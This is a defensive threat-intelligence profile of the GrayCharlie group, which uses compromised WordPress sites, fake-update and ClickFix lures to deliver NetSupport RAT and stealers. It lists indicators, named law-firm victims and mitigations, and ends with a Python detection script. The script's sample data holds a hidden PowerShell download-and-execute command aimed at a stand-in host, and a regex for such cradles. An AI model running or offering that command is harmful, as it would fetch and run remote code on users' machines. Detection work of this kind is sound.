GrayCharlie turns compromised WordPress sites into malware delivery machines. Discover how this threat actor chains fake browser updates and ClickFix lures to deploy NetSupport RAT, Stealc, and SectopRAT.
Analysis Summary
# Threat Actor: GrayCharlie
## Attribution & Identity
**GrayCharlie** is a threat activity group that has been active since at least mid-2023. Insikt Group identifies significant overlaps between GrayCharlie and other tracked entities, including:
* **Known Aliases:** SmartApeSG, ZPHP, and HANEYMANEY.
* **Associated Groups:** Potential overlaps with actors utilizing "ClickFix" social engineering kits.
* **Identity:** While specific individuals are not named, the actor utilizes distinct infrastructure clusters (likely managed by different associates) primarily hosted on MivoCloud and HZ Hosting Ltd.
## Activity Summary
GrayCharlie specializes in compromising WordPress websites to serve as a launchpad for malware. Mid-2023 to early 2024 operations focused on **Fake Browser Update** lures (Chrome, Edge, Firefox). In March/April 2025, the actor shifted tactics to **ClickFix** mechanisms: convincing users to copy and paste malicious PowerShell scripts into their system terminal to "fix" a browser error. These campaigns primarily deliver **NetSupport RAT**, which often serves as a precursor to secondary payloads such as **Stealc** (infostealer) and **SectopRAT**.
## Tactics, Techniques & Procedures
* **Resource Development:** High-volume deployment of C2 infrastructure and acquisition of TLS certificates for NetSupport clusters.
* **Initial Access:** Compromise of WordPress sites (possibly via vulnerability exploitation or supply-chain compromise of IT providers).
* **Execution:**
  * **Fake Updates:** JavaScript injections prompting users to download malicious "browser updates."
  * **ClickFix:** Social engineering lures that trick victims into executing malicious code via the Windows Run dialog or PowerShell.
* **Command and Control:** Large-scale use of NetSupport RAT for remote administration.
* **MITRE ATT&CK IDs:**
  * T1189 (Drive-by Compromise)
  * T1204.002 (User Execution: Malicious File)
  * T1584.004 (Compromise Infrastructure: Server)
  * T1219 (Remote Access Software)
## Targeting
* **Sectors:** Primarily opportunistic, spanning numerous industries; however, a specific 2025 campaign focused on the **Legal Sector**.
* **Geography:** Global distribution with a heavy concentration of targets in the **United States**.
* **Victims:** Specific US-based law firms including bianchilawgroup[.]com, brattonlawgroup[.]com, fisherstonelaw[.]com, and gerlinglaw[.]com, likely via a shared IT provider supply-chain attack.
## Tools & Infrastructure
* **Malware Families:**
  * **NetSupport RAT:** Primary remote access tool.
  * **Stealc:** Information stealer for harvesting credentials/data.
  * **SectopRAT (Arechclient2):** Follow-on RAT for persistent access.
* **Infrastructure:**
  * **Hosting:** Heavy usage of MivoCloud and HZ Hosting Ltd.
  * **C2 IPs:** 85[.]158[.]110[.]179 (SectopRAT).
  * **Staging Domains:** husinhthaidanphuong[.]top, kingdomholding[.]top, mindsetgrowth[.]shop, linksoflondononsale[.]top.
  * **Associated Email:** oreshnik[@]mailum[.]com.
## Implications
GrayCharlie represents a persistent and evolving threat with a focus on both quantity and quality. The shift to ClickFix indicates an actor that stays current with effective social engineering trends. The targeted compromise of US law firms suggests a possible shift toward higher-value targets, where the data stolen via Stealc or SectopRAT could be used for financial gain, extortion, or the sale of access to other cybercriminals.
## Mitigations
* **Web Defenses:** Block connections to known compromised WordPress domains and "staging" domains used for JavaScript delivery.
* **Endpoint Controls:** Restrict or monitor the use of administrative tools like PowerShell and `cmd.exe`, especially when initiated via a browser process.
* **User Training:** Train employees to recognize "Fake Update" and "ClickFix" lures; emphasize that legitimate browser updates never require manual PowerShell execution.
* **Monitoring:** Deploy YARA and Sigma rules to detect NetSupport RAT artifacts and SectopRAT execution. Monitor for unauthorized data exfiltration to known MivoCloud/HZ Hosting IP ranges associated with C2.
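The endpoint-control and web-defense mitigations above can be expressed as two simple detections: a shell (PowerShell or `cmd.exe`) whose parent is a browser process or Explorer (the Run dialog path), and DNS resolution of the staging domains listed in this report. The following script is an added example written for this page, not Insikt Group code; the event field names (`parent_image`, `image`, `command_line`, `query`) are assumptions loosely modelled on Sysmon-style telemetry, and all sample events are constructed.

```python
"""Detection logic for the ClickFix / fake-update execution chain and the
staging domains listed in this report. Added example, not from the report;
event field names are assumptions modelled on Sysmon-style telemetry."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Process names taken from the report's lure and execution descriptions.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Staging domains exactly as the report defangs them.
STAGING_DOMAINS_DEFANGED = [
    "husinhthaidanphuong[.]top",
    "kingdomholding[.]top",
    "mindsetgrowth[.]shop",
    "linksoflondononsale[.]top",
]


def refang(indicator: str) -> str:
    """Convert the report's defanged '[.]' / '[@]' notation into a matchable string."""
    return indicator.replace("[.]", ".").replace("[@]", "@").strip().lower()


STAGING_DOMAINS = {refang(d) for d in STAGING_DOMAINS_DEFANGED}

# Generic traits of copy/paste PowerShell payloads (hidden window, encoded
# command, download-and-execute cradle). Not specific to GrayCharlie.
SUSPICIOUS_FLAGS = re.compile(
    r"-w(?:indowstyle)?\s+hidden"
    r"|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
    r"|\biex\b|invoke-expression|\birm\b|invoke-restmethod|downloadstring",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class DnsEvent:
    host: str
    query: str


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: ProcessEvent) -> dict | None:
    """Flag a shell spawned by a browser (high), or spawned from explorer.exe
    (the Run dialog path) with suspicious command-line traits (medium)."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    if child not in SHELLS:
        return None
    if parent in BROWSERS:
        return {"host": ev.host, "severity": "high",
                "reason": f"{child} spawned by browser {parent}"}
    if parent == "explorer.exe" and SUSPICIOUS_FLAGS.search(ev.command_line):
        return {"host": ev.host, "severity": "medium",
                "reason": f"{child} from explorer.exe with suspicious flags"}
    return None


def check_dns(ev: DnsEvent) -> dict | None:
    """Flag resolution of a listed staging domain or any subdomain of one."""
    q = ev.query.lower().rstrip(".")
    for dom in STAGING_DOMAINS:
        if q == dom or q.endswith("." + dom):
            return {"host": ev.host, "severity": "high",
                    "reason": f"DNS query for staging domain {dom} ({q})"}
    return None


def run(process_events, dns_events) -> list[dict]:
    """Apply both checks and return the alerts in input order."""
    alerts = [a for a in map(check_process, process_events) if a]
    alerts += [a for a in map(check_dns, dns_events) if a]
    return alerts


# Constructed sample telemetry (not taken from the report).
SAMPLE_PROCESS = [
    ProcessEvent("WS01", r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -w hidden -c "iex (irm http://example.invalid/fix)"'),
    ProcessEvent("WS02", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -EncodedCommand " + "QQ" * 20),
    ProcessEvent("WS03", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c dir"),
    ProcessEvent("WS04", r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]
SAMPLE_DNS = [
    DnsEvent("WS01", "cdn.kingdomholding.top"),
    DnsEvent("WS02", "www.microsoft.com"),
    DnsEvent("WS05", "mindsetgrowth.shop."),
]

if __name__ == "__main__":
    for alert in run(SAMPLE_PROCESS, SAMPLE_DNS):
        print(alert)
```

The browser-parent rule is the high-confidence signal because a browser has no legitimate reason to spawn PowerShell; the Explorer rule is weaker on its own (users launch shells from the Run dialog every day), so it only fires when the command line also shows hidden-window, encoded or download-cradle traits. Matching DNS on suffixes catches subdomains of the staging domains as well as the apex names, and trailing-dot queries are normalised before comparison.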